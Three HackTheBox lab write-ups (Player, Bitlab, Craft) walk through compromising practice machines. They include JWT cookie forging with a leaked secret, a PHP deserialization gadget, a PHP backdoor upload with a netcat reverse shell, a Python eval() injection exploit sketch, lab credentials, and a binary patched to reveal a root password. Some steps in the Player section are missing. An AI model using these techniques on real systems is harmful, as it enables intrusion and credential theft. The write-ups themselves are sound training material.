Don't forget to read the previous write-ups, and tweet about this one if you liked it. Follow me on twitter @Ahm3d_H3sham. Thanks for reading.
Hey guys, today Player retired and here's my write-up about it. It was a relatively hard CTF-style machine with a lot of enumeration and a couple of interesting exploits. It's a Linux box and its IP is 10.10.10.145; I added it to /etc/hosts as player.htb. Let's jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/player# nmap -sV -sT -sC -o nmapinitial player.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 16:29 EST
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA)
| 2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA)
| 256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA)
|_ 256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519)
80/tcp open http Apache httpd 2.4.7
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.12 seconds
root@kali:~/Desktop/HTB/boxes/player#
We got http on port 80 and ssh on port 22.
Web Enumeration
I got a 403 response when I went to http://player.htb/, so I fuzzed for virtual hosts with wfuzz:
root@kali:~/Desktop/HTB/boxes/player# wfuzz --hc 403 -c -w subdomains-top1mil-5000.txt -H "HOST: FUZZ.player.htb" http://10.10.10.145
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.145/
Total requests: 4997
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000019: 200 86 L 229 W 5243 Ch "dev"
000000067: 200 63 L 180 W 1470 Ch "staging"
000000070: 200 259 L 714 W 9513 Ch "chat"
Total time: 129.1540
Processed Requests: 4997
Filtered Requests: 4994
Requests/sec.: 38.69021
root@kali:~/Desktop/HTB/boxes/player#
I added them to my hosts file and started checking each one of them.
On dev there was an application that needed credentials so we’ll skip that one until we find some credentials:
staging was kind of empty, but there was an interesting contact form:
The form was interesting because when I attempted to submit it I got a weird error for a second, then I got redirected to /501.php:
I intercepted the request with burp to read the error.
Request:
GET /contact.php?firstname=test&subject=test HTTP/1.1
Host: staging.player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging.player.htb/contact.html
Connection: close
Upgrade-Insecure-Requests: 1
The error exposed some filenames like /var/www/backup/service_config, /var/www/staging/fix.php and /var/www/staging/contact.php, which will be helpful later.

chat was a static page that simulated a chat application:
I took a quick look at the chat history between Olla and Vincent. Olla asked him about some pentest reports, and he replied with 2 interesting things:
Staging exposing sensitive files.
Main domain exposing source code allowing to access the product before release.
We already saw that staging was exposing files. I ran gobuster on the main domain and found /launcher:
I tried to submit that form but it did nothing, I just got redirected to /launcher again:
Request:
GET /launcher/dee8dc8a47256c64630d803a4c40786c.php HTTP/1.1
Host: player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://player.htb/launcher/index.html
Connection: close
Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ.cjGwng6JiMiOWZGz7saOdOuhyr1vad5hAxOJCiM3uzU
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 302 Found
Date: Fri, 17 Jan 2020 22:45:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: index.html
Content-Length: 0
Connection: close
Content-Type: text/html
We know from the chat that the source code is exposed somewhere, and I wanted to read the source of /launcher/dee8dc8a47256c64630d803a4c40786c.php, so I tried some basic tricks like adding .swp, .bak or ~ after the file name. ~ worked (check this out):
It decodes the JWT token from the access cookie and redirects us to a redacted path if the value of access_code is 0E76658526655756207688271159624026011393; otherwise it assigns us an access cookie with C0B137FE2D792459F26FF763CCE44574A5B5AB03 as the access_code value and redirects us to index.html.
We have the secret _S0_R@nd0m_P@ss_ so we can easily craft a valid cookie. I used jwt.io to edit my token.
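If you'd rather not use jwt.io, signing an HS256 token by hand takes only the standard library. This is a generic sketch using the claim names and secret from above; the resulting token isn't guaranteed to be byte-identical to the one the site issues:

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    # JWTs use unpadded URL-safe base64.
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def make_jwt(payload, secret):
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"},
                               separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = header + b"." + body
    sig = b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())
    return (signing_input + b"." + sig).decode()

token = make_jwt(
    {"project": "PlayBuff",
     "access_code": "0E76658526655756207688271159624026011393"},
    b"_S0_R@nd0m_P@ss_")
```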
I used the cookie and got redirected to /7F2dcsSdZo6nj3SNMTQ1:
Request:
GET /launcher/dee8dc8a47256c64630d803a4c40786c.php HTTP/1.1
Host: player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://player.htb/launcher/index.html
Connection: close
Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 302 Found
Date: Fri, 17 Jan 2020 22:50:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: 7F2dcsSdZo6nj3SNMTQ1/
Content-Length: 0
Connection: close
Content-Type: text/html
contact.php didn’t have anything interesting and the avi for fix.php was empty for some reason. In service_config there were some credentials for a user called telegen:
I tried these credentials with ssh and with dev.player.htb, but they didn't work. I ran a quick full port scan with masscan, and it turned out there was another open port:
root@kali:~/Desktop/HTB/boxes/player# masscan -p1-65535 10.10.10.145 --rate=1000 -e tun0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-18 00:09:24 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.145
Discovered open port 80/tcp on 10.10.10.145
Discovered open port 6686/tcp on 10.10.10.145
I scanned that port with nmap but it couldn’t identify the service:
PORT STATE SERVICE VERSION
6686/tcp open tcpwrapped
However when I connected to the port with nc the banner indicated that it was an ssh server:
I couldn’t write to it but it included another php file which I could write to (/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php):
www-data@player:/tmp$ cd /var/lib/playbuff/
www-data@player:/var/lib/playbuff$ cat buff.php
<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
    public $logFile = "/var/log/playbuff/logs.txt";
    public $logData = "Updated";
    public function __wakeup()
    {
        file_put_contents(__DIR__."/".$this->logFile, $this->logData);
    }
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data)){
    $update = file_get_contents("/var/lib/playbuff/logs.txt");
    $query = mysqli_query($conn, "update stats set status='$update' where id=1");
    if($query){
        echo 'Update Success with serialized logs!';
    }
}else{
    file_put_contents("/var/lib/playbuff/merge.log", "no issues yet");
    $update = file_get_contents("/var/lib/playbuff/logs.txt");
    $query = mysqli_query($conn, "update stats set status='$update' where id=1");
    if($query){
        echo 'Update Success!';
    }
}
?>
www-data@player:/var/lib/playbuff$
I put my reverse shell payload in /tmp and added a line to /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php that executed it:
And we owned root!
That's it, feedback is appreciated!
Don't forget to read the previous write-ups, and tweet about this one if you liked it. Follow me on twitter @Ahm3d_H3sham. Thanks for reading.
Hey guys, today Bitlab retired and here's my write-up about it. It was a nice CTF-style machine that mainly involved a direct file upload and a simple reverse engineering challenge. It's a Linux box and its IP is 10.10.10.114; I added it to /etc/hosts as bitlab.htb. Let's jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/bitlab# nmap -sV -sT -sC -o nmapinitial bitlab.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 13:44 EST
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open http nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds
root@kali:~/Desktop/HTB/boxes/bitlab#
We got http on port 80 and ssh on port 22; robots.txt existed on the web server and had a lot of entries.
Web Enumeration
Gitlab was running on the web server and we need credentials:
I checked /robots.txt to see if there was anything interesting:
root@kali:~/Desktop/HTB/boxes/bitlab# curl http://bitlab.htb/robots.txt [18/43]
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow: /
# Add a 1 second delay between successive requests to the same server, limits resources used by crawler
# Only some crawlers respect this setting, e.g. Googlebot does not
# Crawl-delay: 1
# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application
User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in
# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw
# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
Disallow: /*/-/group_members
Disallow: /*/project_members
root@kali:~/Desktop/HTB/boxes/bitlab#
Most of the disallowed entries were paths related to the Gitlab application. I checked /help and found a page called bookmarks.html:
There was an interesting link called Gitlab Login:
Clicking on that link didn't do anything, so I checked the source of the page; the href attribute held some javascript code:
<DT><A HREF="javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()" ADD_DATE="1554932142">Gitlab Login</A>
I took that code, edited it a little bit and used the js console to execute it:
After logging in with the credentials (clave : 11des0081x) I found two repositories, Profile and Deployer:
I also checked the snippets and found an interesting one that held the database credentials, which will be useful later:
<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");
Back to the repositories, I checked Profile and it was pretty empty:
The path /profile was one of the disallowed entries in /robots.txt. I wanted to check whether that path was related to the repository, so I checked if the same image (developer.jpg) existed there, and it did:
Now we can simply upload a php shell and access it through /profile, I uploaded the php-simple-backdoor:
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.114] 44340
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@bitlab:/var/www/html/profile$ ^Z
[1]+ Stopped nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/bitlab# stty raw -echo
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337
www-data@bitlab:/var/www/html/profile$ export TERM=screen
www-data@bitlab:/var/www/html/profile$
Database Access –> Clave’s Password –> SSH as Clave –> User Flag
After getting a shell as www-data I wanted to use the credentials I got earlier from the code snippet and see what was in the database; however, psql wasn't installed:
www-data@bitlab:/var/www/html/profile$ psql
bash: psql: command not found
www-data@bitlab:/var/www/html/profile$
From the php interactive shell I executed the same query from the code snippet, which selected everything from the profiles table, and I got clave's password, which I could use for ssh access:
php > $result = $connection->query("SELECT * FROM profiles");
php > $profiles = $result->fetchAll();
php > print_r($profiles);
Array
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )
)
php >
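The password column looks base64-encoded; the trailing == is stray padding (the string is already a multiple of four characters, so b64decode rejects the over-padded form). Decoding it:

```python
import base64

# Drop the stray "==" before decoding; with it, b64decode raises an
# error because the length is no longer a multiple of four.
decoded = base64.b64decode("c3NoLXN0cjBuZy1wQHNz").decode()
print(decoded)  # ssh-str0ng-p@ss
```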
We owned user.
Reversing RemoteConnection.exe –> Root’s Password –> SSH as Root –> Root Flag
In the home directory of clave there was a Windows executable called RemoteConnection.exe:
clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave 4096 Aug 8 14:40 .
drwxr-xr-x 3 root root 4096 Feb 28 2019 ..
lrwxrwxrwx 1 root root 9 Feb 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave 3771 Feb 28 2019 .bashrc
drwx------ 2 clave clave 4096 Aug 8 14:40 .cache
drwx------ 3 clave clave 4096 Aug 8 14:40 .gnupg
-rw-r--r-- 1 clave clave 807 Feb 28 2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave 33 Feb 28 2019 user.txt
clave@bitlab:~$
Then I started looking at the decompiled code in Ghidra. One function that caught my attention was FUN_00401520():
/* WARNING: Could not reconcile some variable overlaps */

void FUN_00401520(void)
{
  LPCWSTR pWVar1;
  undefined4 ***pppuVar2;
  LPCWSTR lpParameters;
  undefined4 ***pppuVar3;
  int **in_FS_OFFSET;
  uint in_stack_ffffff44;
  undefined4 *puVar4;
  uint uStack132;
  undefined *local_74;
  undefined *local_70;
  wchar_t *local_6c;
  void *local_68[4];
  undefined4 local_58;
  uint local_54;
  void *local_4c[4];
  undefined4 local_3c;
  uint local_38;
  undefined4 ***local_30[4];
  int local_20;
  uint local_1c;
  uint local_14;
  int *local_10;
  undefined *puStack12;
  undefined4 local_8;

  local_8 = 0xffffffff;
  puStack12 = &LAB_004028e0;
  local_10 = *in_FS_OFFSET;
  uStack132 = DAT_00404018 ^ (uint)&stack0xfffffffc;
  *(int ***)in_FS_OFFSET = &local_10;
  local_6c = (wchar_t *)0x4;
  local_14 = uStack132;
  GetUserNameW((LPWSTR)0x4,(LPDWORD)&local_6c);
  local_38 = 0xf;
  local_3c = 0;
  local_4c[0] = (void *)((uint)local_4c[0] & 0xffffff00);
  FUN_004018f0();
  local_8 = 0;
  FUN_00401260(local_68,local_4c);
  local_74 = &stack0xffffff60;
  local_8._0_1_ = 1;
  FUN_004018f0();
  local_70 = &stack0xffffff44;
  local_8._0_1_ = 2;
  puVar4 = (undefined4 *)(in_stack_ffffff44 & 0xffffff00);
  FUN_00401710(local_68);
  local_8._0_1_ = 1;
  FUN_00401040(puVar4);
  local_8 = CONCAT31(local_8._1_3_,3);
  lpParameters = (LPCWSTR)FUN_00401e6d();
  pppuVar3 = local_30[0];
  if (local_1c < 0x10) {
    pppuVar3 = local_30;
  }
  pWVar1 = lpParameters;
  pppuVar2 = local_30[0];
  if (local_1c < 0x10) {
    pppuVar2 = local_30;
  }
  while (pppuVar2 != (undefined4 ***)(local_20 + (int)pppuVar3)) {
    *pWVar1 = (short)*(char *)pppuVar2;
    pWVar1 = pWVar1 + 1;
    pppuVar2 = (undefined4 ***)((int)pppuVar2 + 1);
  }
  lpParameters[local_20] = L'\0';
  if (local_6c == L"clave") {
    ShellExecuteW((HWND)0x0,L"open",L"C:\\Program Files\\PuTTY\\putty.exe",
                  lpParameters,(LPCWSTR)0x0,10);
  }
  else {
    FUN_00401c20((int *)cout_exref);
  }
  if (0xf < local_1c) {
    operator_delete(local_30[0]);
  }
  local_1c = 0xf;
  local_20 = 0;
  local_30[0] = (undefined4 ***)((uint)local_30[0] & 0xffffff00);
  if (0xf < local_54) {
    operator_delete(local_68[0]);
  }
  local_54 = 0xf;
  local_58 = 0;
  local_68[0] = (void *)((uint)local_68[0] & 0xffffff00);
  if (0xf < local_38) {
    operator_delete(local_4c[0]);
  }
  *in_FS_OFFSET = local_10;
  FUN_00401e78();
  return;
}
It looked like it was checking whether the name of the user running the program was clave; if so, it executed PuTTY with some parameters that I couldn’t see:
I copied the executable to a Windows machine and tried to run it, but it just kept crashing.
I opened it in Immunity Debugger to find out what was happening, and I found an access violation:
It happened before reaching the function I was interested in, so I had to fix it. I simply replaced the instructions that caused the access violation with NOPs.
I had to set a breakpoint before the cmp instruction, so I searched for the word “clave” in the referenced text strings and followed it in the disassembler:
Then I executed the program, and whenever I hit an access violation I replaced the offending instructions with NOPs. It happened twice before I reached my breakpoint:
After reaching the breakpoint I could see the parameters the program passes to putty.exe in both eax and ebx. It was starting an SSH session as root, and I could see the password:
And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about this one if you liked it, and follow me on Twitter: @Ahm3d_H3sham
Thanks for reading.
Hey guys, today Craft retired and here’s my write-up about it. It’s a medium-rated Linux box and its IP is 10.10.10.110; I added it to /etc/hosts as craft.htb. Let’s jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/craft# nmap -sV -sT -sC -o nmapinitial craft.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-03 13:41 EST
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey:
| 2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
| 256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_ 256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
443/tcp open ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: About
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after: 2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.97 seconds
root@kali:~/Desktop/HTB/boxes/craft#
We got https on port 443 and ssh on port 22.
Web Enumeration
The home page was kinda empty; only the about info and nothing else:
The navigation bar had two external links, one of them was to https://api.craft.htb/api/ and the other one was to https://gogs.craft.htb:
So I added both api.craft.htb and gogs.craft.htb to /etc/hosts, then I started checking them. https://api.craft.htb/api:
Here we can see the API endpoints and how to interact with them.
We’re interested in the authentication part for now, there are two endpoints, /auth/check which checks the validity of an authorization token and /auth/login which creates an authorization token provided valid credentials.
We don’t have credentials to authenticate so let’s keep enumerating.
Obviously, gogs.craft.htb had Gogs running:
The repository of the API source code was publicly accessible so I took a look at the code and the commits.
Dinesh’s commits c414b16057 and 10e3ba4f0a had some interesting stuff. The first one added code to /brew/endpoints/brew.py where the user’s input is passed to eval() without filtering:
@@ -38,9 +38,13 @@ class BrewCollection(Resource):
         """
         Creates a new brew entry.
         """
-        create_brew(request.json)
-        return None, 201
+        # make sure the ABV value is sane.
+        if eval('%s > 1' % request.json['abv']):
+            return "ABV must be a decimal value less than 1.0", 400
+        else:
+            create_brew(request.json)
+            return None, 201

 @ns.route('/<int:id>')
 @api.response(404, 'Brew not found.')
I took a look at the API documentation again to find in which request I can send the abv parameter:
As you can see, we can send a POST request to /brew and inject our payload in the abv parameter. However, we still need an authorization token to be able to interact with /brew, and we don’t have any credentials.
The other commit was a test script with hardcoded credentials, exactly what we need:
+response = requests.get('https://api.craft.htb/api/auth/login', auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
+json_response = json.loads(response.text)
+token = json_response['token']
+
+headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json' }
+
+# make sure token is valid
+response = requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False)
+print(response.text)
+
I tested the credentials and they were valid:
RCE –> Shell on Docker Container
I wrote a small script to authenticate, grab the token, exploit the vulnerability and spawn a shell. exploit.py:
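The original exploit.py isn’t reproduced in this post, so here is a minimal sketch of the idea. It is an assumption-labeled reconstruction, not the original script: the eval() sink and the X-Craft-API-Token header come from the commits above, while the exact brew field names and the reverse-shell command are placeholders.

```python
# Hypothetical sketch of exploit.py -- NOT the original script.
# The sink is: eval('%s > 1' % request.json['abv']) in the /brew endpoint,
# so any Python expression sent as "abv" is evaluated server-side.
import json


def make_payload(cmd):
    # A Python expression that runs a shell command when eval()'d.
    return "__import__('os').popen('%s').read()" % cmd


def make_brew(cmd):
    # Field names other than "abv" are illustrative placeholders.
    return json.dumps({"name": "x", "brewer": "x", "style": "x",
                       "abv": make_payload(cmd)})


# Live usage against the box would look roughly like:
#   import requests
#   r = requests.get("https://api.craft.htb/api/auth/login",
#                    auth=("dinesh", "4aUh0A8PbVJxgd"), verify=False)
#   token = r.json()["token"]
#   headers = {"X-Craft-API-Token": token, "Content-Type": "application/json"}
#   requests.post("https://api.craft.htb/api/brew/", headers=headers,
#                 data=make_brew("<reverse shell one-liner>"), verify=False)
```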
It turned out that the application was hosted in a Docker container, so I didn’t get a shell on the actual host.
/opt/app # cd /
/ # ls -la
total 64
drwxr-xr-x 1 root root 4096 Feb 10 2019 .
drwxr-xr-x 1 root root 4096 Feb 10 2019 ..
-rwxr-xr-x 1 root root 0 Feb 10 2019 .dockerenv
drwxr-xr-x 1 root root 4096 Jan 3 17:20 bin
drwxr-xr-x 5 root root 340 Jan 3 14:58 dev
drwxr-xr-x 1 root root 4096 Feb 10 2019 etc
drwxr-xr-x 2 root root 4096 Jan 30 2019 home
drwxr-xr-x 1 root root 4096 Feb 6 2019 lib
drwxr-xr-x 5 root root 4096 Jan 30 2019 media
drwxr-xr-x 2 root root 4096 Jan 30 2019 mnt
drwxr-xr-x 1 root root 4096 Feb 9 2019 opt
dr-xr-xr-x 238 root root 0 Jan 3 14:58 proc
drwx------ 1 root root 4096 Jan 3 15:16 root
drwxr-xr-x 2 root root 4096 Jan 30 2019 run
drwxr-xr-x 2 root root 4096 Jan 30 2019 sbin
drwxr-xr-x 2 root root 4096 Jan 30 2019 srv
dr-xr-xr-x 13 root root 0 Jan 3 14:58 sys
drwxrwxrwt 1 root root 4096 Jan 3 17:26 tmp
drwxr-xr-x 1 root root 4096 Feb 9 2019 usr
drwxr-xr-x 1 root root 4096 Jan 30 2019 var
/ #
Gilfoyle’s Gogs Credentials –> SSH Key –> SSH as Gilfoyle –> User Flag
In /opt/app there was a Python script called dbtest.py. It connects to the database and executes a SQL query:
/opt/app# ls -la
total 44
drwxr-xr-x    5 root     root          4096 Jan  3 17:28 .
drwxr-xr-x    1 root     root          4096 Feb  9  2019 ..
drwxr-xr-x    8 root     root          4096 Feb  8  2019 .git
-rw-r--r--    1 root     root            18 Feb  7  2019 .gitignore
-rw-r--r--    1 root     root          1585 Feb  7  2019 app.py
drwxr-xr-x    5 root     root          4096 Feb  7  2019 craft_api
-rwxr-xr-x    1 root     root           673 Feb  8  2019 dbtest.py
drwxr-xr-x    2 root     root          4096 Feb  7  2019 tests
/opt/app# cat dbtest.py
#!/usr/bin/env python
import pymysql
from craft_api import settings

# test connection to mysql database
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try:
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)
finally:
    connection.close()
/opt/app#
I copied the script, changed result = cursor.fetchone() to result = cursor.fetchall(), and changed the query to SHOW TABLES:
#!/usr/bin/env python
import pymysql
from craft_api import settings

# test connection to mysql database
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try:
    with connection.cursor() as cursor:
        sql = "SHOW TABLES"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)
finally:
    connection.close()
One of the tables was called user, so I changed the query to SELECT * FROM user:
#!/usr/bin/env python
import pymysql
from craft_api import settings

# test connection to mysql database
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try:
    with connection.cursor() as cursor:
        sql = "SELECT * FROM user"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)
finally:
    connection.close()
The table had all of the users’ credentials stored in plain text:
Gilfoyle had a private repository called craft-infra:
He left his private ssh key in the repository:
When I tried to use the key it asked for a passphrase, as the key was encrypted. I tried his Gogs password (ZEU3N8WNM2rh4T) and it worked:
We owned user.
Vault –> One-Time SSH Password –> SSH as root –> Root Flag
In Gilfoyle’s home directory there was a file called .vault-token:
gilfoyle@craft:~$ ls -la
total 44
drwx------ 5 gilfoyle gilfoyle 4096 Jan 3 13:42 .
drwxr-xr-x 3 root root 4096 Feb 9 2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb 9 2019 .config
